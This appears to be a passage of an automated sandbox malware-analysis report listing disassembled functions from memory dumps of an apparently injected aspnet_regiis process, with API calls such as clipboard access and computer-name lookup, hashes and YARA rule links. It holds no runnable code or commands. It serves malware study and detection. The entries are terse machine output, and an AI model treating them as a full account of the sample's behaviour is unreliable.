                                                                                                                                                                                                                                                                  Function 72C57440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                                  • Opcode ID: ae24a9c0565cb71d9cc5d5f7a56972cb52d0df7ffd5bb92d7e772cc71c522cab
                                                                                                                                                                                                                                                                  • Instruction ID: 0958fb32b39ec00d43c48862865938bc7e2a18b60c33a4d36a496ca8dd1ae876
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae24a9c0565cb71d9cc5d5f7a56972cb52d0df7ffd5bb92d7e772cc71c522cab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11713AB1A043005BD7058A2EDC93B6B77F1DFE5318F69852CE48787382E634DA49C75A
                                                                                                                                                                                                                                                                  Function 72C71720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: =<32
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                                                  • Opcode ID: e85814dc1c3a7c428ef50ac6838574ac2e2afb373a5494cd822b611795a871ef
                                                                                                                                                                                                                                                                  • Instruction ID: b164c5fce8d24b53a0c93597b6a72b756a2be1d90e473a5a4ebe282f1f9220f5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e85814dc1c3a7c428ef50ac6838574ac2e2afb373a5494cd822b611795a871ef
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56316639608344AFE304CE69CC90B3BB7AAEFE4754F159A2CE68257390E7B0D8408781
                                                                                                                                                                                                                                                                  Function 72C51A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ,-
                                                                                                                                                                                                                                                                  • API String ID: 0-1027024164
                                                                                                                                                                                                                                                                  • Opcode ID: a1944d2d9709ad2fe14c7f4ea07cfd0e6a07cea613789c0f27e2245553877723
                                                                                                                                                                                                                                                                  • Instruction ID: 100fe3d2155e1d88966e0cf56399d455cd435e9411571d4e852fcd22ff74b789
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1944d2d9709ad2fe14c7f4ea07cfd0e6a07cea613789c0f27e2245553877723
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E2167A19503008BC3129F2ECC56627B7B2EFD2364F559618F4828F351F3B4C906C7A6
                                                                                                                                                                                                                                                                  Function 72C70340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: 0fdb5e91f227eb3bc91f10741ef382c409cdd7cae009b3c39bc62b8b9aaa11bd
                                                                                                                                                                                                                                                                  • Instruction ID: 8102d98605ae1f3fa7cc2b85b63bc90ba6ca923bf0eb124894678c902378fded
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fdb5e91f227eb3bc91f10741ef382c409cdd7cae009b3c39bc62b8b9aaa11bd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC31E1715083048BD304DE58C8D166FBBF5EBD5324F14893CE69A87390D735D848CB92
                                                                                                                                                                                                                                                                  Function 72C3CC7A Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings$Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1780199113-0
                                                                                                                                                                                                                                                                  • Opcode ID: d7e3eca883618c13f52c53bdb373486923857b48d2684b5bc9421c205cb6df26
                                                                                                                                                                                                                                                                  • Instruction ID: f88e33a3d4e22b7dcf6531bdf261833a65bb9ae5c34d46a7596a27d934a06890
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7e3eca883618c13f52c53bdb373486923857b48d2684b5bc9421c205cb6df26
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C3184E9F002401BE616663A2D62ABF3D574BF1718F58082CD4072B3C3EE65FA1681DB
                                                                                                                                                                                                                                                                  Function 72C38A50 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                                                  • Instruction ID: 17c32b36af0b2803efbe506979ca1e0925f46c217f5c8fe2189d86d3c4cc7e34
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C21C837A627184BD3008E54DCC87917762E7D9318F3E86B8C9249F3D2C57BA91386C0
                                                                                                                                                                                                                                                                  Function 72C5D7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1295 72c5d7ee-72c5d7f3 1296 72c5d7f5-72c5d7f9 1295->1296 1297 72c5d813-72c5d819 1295->1297 1298 72c5d800-72c5d809 1296->1298 1299 72c5d896-72c5dbfb FreeLibrary call 72c6fe00 1297->1299 1298->1298 1301 72c5d80b-72c5d80e 1298->1301 1304 72c5dc00-72c5dc12 1299->1304 1301->1299 1304->1304 1305 72c5dc14-72c5dc19 1304->1305 1306 72c5dc2d 1305->1306 1307 72c5dc1b-72c5dc1f 1305->1307 1309 72c5dc30-72c5dc72 GetComputerNameExA 1306->1309 1308 72c5dc20-72c5dc29 1307->1308 1308->1308 1310 72c5dc2b 1308->1310 1310->1309
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 72C5D898
                                                                                                                                                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 72C5DC43
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                                  • String ID: ;87>
                                                                                                                                                                                                                                                                  • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                                                  • Opcode ID: d249b72306c614633c7fd26bc61a351f93f42aaa4fa22e4fc48957eaf1dc2edc
                                                                                                                                                                                                                                                                  • Instruction ID: 8edaf4c3b6b035064b921dbe8745a3440f83e3fb4f8000f6ae45a847ebea34d4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d249b72306c614633c7fd26bc61a351f93f42aaa4fa22e4fc48957eaf1dc2edc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E21C871504782CFD7128F2AC850716BFF2AFAB201F298A99D4E78B38AD634D486C755
                                                                                                                                                                                                                                                                  Function 72C5D893 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1311 72c5d893-72c5dbfb FreeLibrary call 72c6fe00 1316 72c5dc00-72c5dc12 1311->1316 1316->1316 1317 72c5dc14-72c5dc19 1316->1317 1318 72c5dc2d 1317->1318 1319 72c5dc1b-72c5dc1f 1317->1319 1321 72c5dc30-72c5dc72 GetComputerNameExA 1318->1321 1320 72c5dc20-72c5dc29 1319->1320 1320->1320 1322 72c5dc2b 1320->1322 1322->1321
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 72C5D898
                                                                                                                                                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 72C5DC43
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                                  • String ID: ;87>
                                                                                                                                                                                                                                                                  • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                                                  • Opcode ID: 7cce8715719344e26c1874847838b917660738075b5538c73fd64c4c95995b40
                                                                                                                                                                                                                                                                  • Instruction ID: 58d44740a9f74c65c860af3c13afb014bccf759f92168eeb0c297775a9576d8b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cce8715719344e26c1874847838b917660738075b5538c73fd64c4c95995b40
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB11C8B1101B42CFD7118F3AD85075ABBE2FFAB211F29CA98D4968B396D634D486CB50
                                                                                                                                                                                                                                                                  Function 72C6E34B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 72C6E3BA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2020703349-3019521637
                                                                                                                                                                                                                                                                  • Opcode ID: 7d9c4801b976e5ae29a8d71633f73bdb9194d6569060c5ee7e19ccd28d52a848
                                                                                                                                                                                                                                                                  • Instruction ID: 9aa140ad756664d971f887c9e9de3204d5447a169867ae66af4726620d1c869f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d9c4801b976e5ae29a8d71633f73bdb9194d6569060c5ee7e19ccd28d52a848
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33112F77E8089147DF08CA3DCC561AA77A2A3E432573D4ABDC816E3380D93858068740
                                                                                                                                                                                                                                                                  Function 72C39D1E Relevance: 3.1, APIs: 2, Instructions: 142libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000), ref: 72C39D98
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000), ref: 72C39E78
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                  • Opcode ID: b918624d5eb4c8be4399d2216491bebc755a9bb774e07d36884af07effcf139e
                                                                                                                                                                                                                                                                  • Instruction ID: fbfe8146819471b2bdd73502d8c795b4e3258d82f0f2871567b50325e402ba97
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b918624d5eb4c8be4399d2216491bebc755a9bb774e07d36884af07effcf139e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D4112B4D003409FE7159F78D9D6A9A7FB1FB56224F60479CD4902F3A6C631940ACBE2
                                                                                                                                                                                                                                                                  Function 72C3EF53 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 72C3EF57
                                                                                                                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 72C3F09C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                  • Opcode ID: a7b3961675672919f6088dea3a4f57b199d9ff14327bb489dd7c0d47c58f43ed
                                                                                                                                                                                                                                                                  • Instruction ID: c12f7e5fe1714a418e7775e6f727b9d241e99ba48f14bb08c2aafd3a8cbd7116
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7b3961675672919f6088dea3a4f57b199d9ff14327bb489dd7c0d47c58f43ed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1741C6B4910B40AFD370EF398A0B7137EB8AB05250F504B1DF9E6866D4E331A4198BD7
                                                                                                                                                                                                                                                                  Function 72C3EC77 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 72C3EC89
                                                                                                                                                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 72C3ECA2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 640775948-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1d18f1cf9d80352d2819703c61cfc5232ac075f7b4cdee65f973ba21067914c9
                                                                                                                                                                                                                                                                  • Instruction ID: cbe8297162fac649ce7abe9fe07c0c4999db27ab2ebcb34658043bd02c879393
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d18f1cf9d80352d2819703c61cfc5232ac075f7b4cdee65f973ba21067914c9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AE0E2753D83917AF3788602CD1BF243221AB61F22F300708B7213E3C48BE03504450C
                                                                                                                                                                                                                                                                  Function 72C67764 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 72C6779D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 95929093-0
                                                                                                                                                                                                                                                                  • Opcode ID: b50b340b07807020c386f951b2400486080bc1681c8a9fa1558a57be9792f029
                                                                                                                                                                                                                                                                  • Instruction ID: dc741fb81d0f0153cd1b35c9f73aa494ab7ab0b60082b3ae760283cd1032d7c6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b50b340b07807020c386f951b2400486080bc1681c8a9fa1558a57be9792f029
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A31D532B466808FD715CA7CC8D37ADBFE38BE5214F1E81A9D459CB391C9388946CB20
                                                                                                                                                                                                                                                                  Function 72C5D7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 72C5DD03
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ComputerName
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3545744682-0
                                                                                                                                                                                                                                                                  • Opcode ID: 74f65b53fdf065f2fed50168027f60320ad43909a8cb410cde32cd6dc8c7e154
                                                                                                                                                                                                                                                                  • Instruction ID: 8421f6aa2f28d463f09ba3c359a6108f10c6100d0399eb0b093f7788c96ce285
